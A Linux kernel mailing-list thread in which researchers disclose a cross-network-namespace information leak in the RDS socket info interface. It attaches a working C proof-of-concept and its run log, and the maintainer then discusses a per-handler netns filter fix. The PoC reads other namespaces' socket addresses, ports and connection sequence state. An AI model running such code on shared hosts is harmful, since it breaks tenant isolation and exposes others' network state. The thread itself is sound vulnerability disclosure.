* rds: possible cross netns leak via RDS_INFO_* getsockopt
@ 2026-05-05 8:37 Xie Maoyi
2026-05-05 22:07 ` Allison Henderson
0 siblings, 1 reply; 3+ messages in thread
From: Xie Maoyi @ 2026-05-05 8:37 UTC (permalink / raw)
To: achender@kernel.org
Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
rds-devel@oss.oracle.com
[-- Attachment #1: Type: text/plain, Size: 2600 bytes --]
Hi all,
We are not sure whether what we observed is a real bug or
intended behaviour. We would appreciate your view.
In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
registered in rds_info_funcs[]. Each handler reads a global list
that is not pernet:
rds_sock_info / rds6_sock_info -> rds_sock_list
rds_tcp_tc_info / rds6_tcp_tc_info -> rds_tcp_tc_list
rds_conn_info / rds6_conn_info -> rds_conn_hash[]
None of those filter by the caller's netns. rds_info_getsockopt()
also has no netns or capable() check. rds_create() has no
capable() check either. So AF_RDS is reachable from an
unprivileged user namespace.
Our reading is that an unprivileged caller in a fresh user_ns
plus netns can read RDS state from init_net. We see this in
practice on the latest net tree.
The fields that come back include:
RDS_INFO_SOCKETS: bound addr, port, sock inode of every
RDS socket on the host
RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
last_expected_una, last_seen_una of
every rds-tcp connection on the host
RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
cp_next_rx_seq of every RDS connection
A small reproducer is attached as poc_rds_info.c. With rds and
rds_tcp loaded, the steps are:
modprobe rds
modprobe rds_tcp
./poc_rds_info
The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
root. It then enters a fresh user_ns plus netns and opens AF_RDS
there. The attacker side reads RDS_INFO_SOCKETS and sees the
init_net socket. A run log is attached as poc_verification.log.
We are not sure if this counts as a bug or is by design. The
RDS_INFO_* interface looks diagnostic. It may be expected to be
host wide. On the other hand, AF_RDS is reachable from an
unprivileged user namespace, which is what surprised us.
Could you let us know whether you consider this worth fixing? If
yes, we have a draft patch that gates rds_info_getsockopt() to
init_net. We can send it once you confirm the direction.
Thanks for your time.
Maoyi Xie and Praveen Kakkolangara
Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
________________________________
CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
Towards a sustainable earth: Print only when necessary. Thank you.
[-- Attachment #2: poc_verification.log --]
[-- Type: application/octet-stream, Size: 1183 bytes --]
[victim] AF_RDS bound 127.0.0.1:4242 in init_net (root)
[init-probe] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[init-probe] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
[0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
*** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[init-probe] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[init-probe] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries
[attacker] in netns=net:[4026532260] uid=0
[attacker] AF_RDS opened in fresh netns -> fd=4
[attacker] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[attacker] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
[0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
*** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[attacker] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[attacker] getsockopt(TCP_SOCKETS) rc=41 (each=41) len=0 -> 0 entries
[attacker] count-probe(CONNECTIONS) rc=42 errno=28 optlen-after=0
[attacker] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries
[-- Attachment #3: poc_rds_info.c --]
[-- Type: text/plain, Size: 5895 bytes --]
/* PoC v2: RDS RDS_INFO_* cross-netns getsockopt leak.
* Build: gcc poc_rds_info.c -o poc_rds_info
* Run as root in init_net.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#ifndef AF_RDS
#define AF_RDS 21
#endif
#ifndef SOL_RDS
#define SOL_RDS 276
#endif
#define RDS_INFO_COUNTERS 10000
#define RDS_INFO_CONNECTIONS 10001
#define RDS_INFO_SEND_MESSAGES 10003
#define RDS_INFO_RETRANS_MESSAGES 10004
#define RDS_INFO_RECV_MESSAGES 10005
#define RDS_INFO_SOCKETS 10006
#define RDS_INFO_TCP_SOCKETS 10007
#define RDS6_INFO_CONNECTIONS 10011
#define RDS6_INFO_SOCKETS 10015
#define RDS6_INFO_TCP_SOCKETS 10016
struct rds_info_socket {
uint32_t sndbuf;
uint32_t bound_addr;
uint32_t connected_addr;
uint16_t bound_port;
uint16_t connected_port;
uint32_t rcvbuf;
uint64_t inum;
} __attribute__((packed));
#define VICTIM_PORT 4242
static const char *opt_name(int o) {
switch(o){case 10000:return "COUNTERS";case 10001:return "CONNECTIONS";
case 10003:return "SEND_MSG";case 10004:return "RETRANS_MSG";
case 10005:return "RECV_MSG";case 10006:return "SOCKETS";
case 10007:return "TCP_SOCKETS";case 10011:return "6_CONNECTIONS";
case 10015:return "6_SOCKETS";case 10016:return "6_TCP_SOCKETS";}
return "?";
}
static void probe_one(int s, int opt, const char *who) {
char buf[8192];
socklen_t len = sizeof(buf);
int rc = getsockopt(s, SOL_RDS, opt, buf, &len);
if (rc < 0) {
fprintf(stderr, "[%s] getsockopt(%s) rc=%d errno=%d (%s)\n",
who, opt_name(opt), rc, errno, strerror(errno));
return;
}
int each = rc;
int nentries = each ? (int)len / each : 0;
fprintf(stderr, "[%s] getsockopt(%s) rc=%d (each=%d) len=%u -> %d entries\n",
who, opt_name(opt), rc, each, (unsigned)len, nentries);
if (opt == RDS_INFO_SOCKETS && nentries > 0) {
struct rds_info_socket *si = (void *)buf;
for (int i = 0; i < nentries; i++) {
char b[32];
inet_ntop(AF_INET, &si[i].bound_addr, b, sizeof(b));
fprintf(stderr, " [%d] bound=%s:%u inum=%llu sndbuf=%u rcvbuf=%u\n",
i, b, ntohs(si[i].bound_port),
(unsigned long long)si[i].inum,
si[i].sndbuf, si[i].rcvbuf);
if (si[i].bound_addr == htonl(0x7f000001) &&
ntohs(si[i].bound_port) == VICTIM_PORT) {
fprintf(stderr,
" *** LEAK: this is the victim's init_net socket "
"(127.0.0.1:%u) â visible from attacker's fresh netns ***\n",
VICTIM_PORT);
}
}
}
}
static void probe_count(int s, int opt, const char *who) {
/* len=0 -> kernel returns -ENOSPC + total in optlen, exposing count */
char buf[1];
socklen_t len = 0;
int rc = getsockopt(s, SOL_RDS, opt, buf, &len);
fprintf(stderr, "[%s] count-probe(%s) rc=%d errno=%d optlen-after=%u\n",
who, opt_name(opt), rc, errno, (unsigned)len);
}
int main(void)
{
/* Step 1: Victim socket in init_net. */
int v = socket(AF_RDS, SOCK_SEQPACKET, 0);
if (v < 0) { perror("victim socket(AF_RDS)"); return 2; }
struct sockaddr_in vsin = { .sin_family = AF_INET,
.sin_port = htons(VICTIM_PORT) };
inet_pton(AF_INET, "127.0.0.1", &vsin.sin_addr);
if (bind(v, (struct sockaddr *)&vsin, sizeof(vsin)) < 0) {
perror("victim bind"); return 2;
}
fprintf(stderr, "[victim] AF_RDS bound 127.0.0.1:%d in init_net (root)\n",
VICTIM_PORT);
/* Step 1b: probe from init_net to confirm rds_info works at all */
int probe = socket(AF_RDS, SOCK_SEQPACKET, 0);
if (probe >= 0) {
probe_count(probe, RDS_INFO_SOCKETS, "init-probe");
probe_one(probe, RDS_INFO_SOCKETS, "init-probe");
probe_count(probe, RDS_INFO_TCP_SOCKETS, "init-probe");
probe_one(probe, RDS_INFO_COUNTERS, "init-probe");
close(probe);
}
/* Step 2: fork attacker into fresh user_ns + netns. */
int pipefd[2]; pipe(pipefd);
pid_t pid = fork();
if (pid == 0) {
close(pipefd[0]);
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
perror("unshare"); _exit(2);
}
int fd; char b[64]; int n;
if ((fd = open("/proc/self/setgroups", O_WRONLY)) >= 0) {
write(fd, "deny", 4); close(fd);
}
fd = open("/proc/self/uid_map", O_WRONLY);
n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);
fd = open("/proc/self/gid_map", O_WRONLY);
n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);
char nsa[64]; int rl = readlink("/proc/self/ns/net", nsa, 63);
if (rl > 0) nsa[rl] = 0;
fprintf(stderr, "[attacker] in netns=%s uid=%u\n", nsa, getuid());
int a = socket(AF_RDS, SOCK_SEQPACKET, 0);
if (a < 0) { perror("[attacker] socket(AF_RDS)"); _exit(2); }
fprintf(stderr, "[attacker] AF_RDS opened in fresh netns -> fd=%d\n", a);
probe_count(a, RDS_INFO_SOCKETS, "attacker");
probe_one(a, RDS_INFO_SOCKETS, "attacker");
probe_count(a, RDS_INFO_TCP_SOCKETS, "attacker");
probe_one(a, RDS_INFO_TCP_SOCKETS, "attacker");
probe_count(a, RDS_INFO_CONNECTIONS, "attacker");
probe_one(a, RDS_INFO_COUNTERS, "attacker");
close(a);
write(pipefd[1], "x", 1);
_exit(0);
}
close(pipefd[1]);
char tmp; read(pipefd[0], &tmp, 1);
int status; waitpid(pid, &status, 0);
close(v);
return 0;
}
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
2026-05-05 8:37 rds: possible cross netns leak via RDS_INFO_* getsockopt Xie Maoyi
@ 2026-05-05 22:07 ` Allison Henderson
2026-05-06 7:10 ` Xie Maoyi
0 siblings, 1 reply; 3+ messages in thread
From: Allison Henderson @ 2026-05-05 22:07 UTC (permalink / raw)
To: Xie Maoyi
Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
rds-devel@oss.oracle.com
On Tue, 2026-05-05 at 08:37 +0000, Xie Maoyi wrote:
> Hi all,
>
> We are not sure whether what we observed is a real bug or
> intended behaviour. We would appreciate your view.
>
> In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
> registered in rds_info_funcs[]. Each handler reads a global list
> that is not pernet:
>
> rds_sock_info / rds6_sock_info -> rds_sock_list
> rds_tcp_tc_info / rds6_tcp_tc_info -> rds_tcp_tc_list
> rds_conn_info / rds6_conn_info -> rds_conn_hash[]
>
> None of those filter by the caller's netns. rds_info_getsockopt()
> also has no netns or capable() check. rds_create() has no
> capable() check either. So AF_RDS is reachable from an
> unprivileged user namespace.
>
> Our reading is that an unprivileged caller in a fresh user_ns
> plus netns can read RDS state from init_net. We see this in
> practice on the latest net tree.
>
> The fields that come back include:
>
> RDS_INFO_SOCKETS: bound addr, port, sock inode of every
> RDS socket on the host
> RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
> last_expected_una, last_seen_una of
> every rds-tcp connection on the host
> RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
> cp_next_rx_seq of every RDS connection
>
> A small reproducer is attached as poc_rds_info.c. With rds and
> rds_tcp loaded, the steps are:
>
> modprobe rds
> modprobe rds_tcp
> ./poc_rds_info
>
> The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
> root. It then enters a fresh user_ns plus netns and opens AF_RDS
> there. The attacker side reads RDS_INFO_SOCKETS and sees the
> init_net socket. A run log is attached as poc_verification.log.
>
> We are not sure if this counts as a bug or is by design. The
> RDS_INFO_* interface looks diagnostic. It may be expected to be
> host wide. On the other hand, AF_RDS is reachable from an
> unprivileged user namespace, which is what surprised us.
>
> Could you let us know whether you consider this worth fixing? If
> yes, we have a draft patch that gates rds_info_getsockopt() to
> init_net. We can send it once you confirm the direction.
>
> Thanks for your time.
>
> Maoyi Xie and Praveen Kakkolangara
>
> Maoyi Xie
> Nanyang Technological University
> https://maoyixie.com/
Hi Xie,
Thanks for looking into this. I think your findings are valid, diagnostic or debug tools shouldn't allow callers
visibility into another netns. Note though that while the ib transport is limited to init_net the tcp transport is not
(see rds_set_transport()). So one gate in rds_info_getsockopt would incorrectly filter netns that a tcp connection
might have legitimate visibility to. So the fix would need a filter in each of the three handlers you've identified,
where we can compare the netns of the socket to the netns of the entry (or c_net for connection paths), and only copy
info for relevant sockets instead of every entry in the respective global list/hash.
Allison
> ________________________________
>
> CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
> Towards a sustainable earth: Print only when necessary. Thank you.
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
2026-05-05 22:07 ` Allison Henderson
@ 2026-05-06 7:10 ` Xie Maoyi
0 siblings, 0 replies; 3+ messages in thread
From: Xie Maoyi @ 2026-05-06 7:10 UTC (permalink / raw)
To: Allison Henderson
Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
rds-devel@oss.oracle.com
Hi Allison,
Thanks for confirming the direction.
We will rewrite the patch as a per entry netns filter in each
of the affected handlers, instead of the init_net gate in
rds_info_getsockopt() that we mentioned. Concretely:
rds_sock_info / rds6_sock_info: skip rds_sock_list entries
whose socket netns does not match the caller's netns.
rds_tcp_tc_info / rds6_tcp_tc_info: skip rds_tcp_tc_list
entries the same way.
rds_conn_info / rds6_conn_info and the *_message_info_*
variants: skip rds_conn_hash[] entries whose c_net does
not match the caller's netns.
This preserves the rds-tcp behaviour where a caller outside
init_net with legitimate connections in their own netns can
still see them.
We will send the patch as a separate reply once it is ready
and verified against the same PoC.
Thanks,
Maoyi Xie and Praveen Kakkolangara
Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
________________________________
CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
Towards a sustainable earth: Print only when necessary. Thank you.
^ permalink raw reply [flat|nested] 3+ messages in thread
end of thread, other threads:[~2026-05-06 7:10 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-05 8:37 rds: possible cross netns leak via RDS_INFO_* getsockopt Xie Maoyi
2026-05-05 22:07 ` Allison Henderson
2026-05-06 7:10 ` Xie Maoyi
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox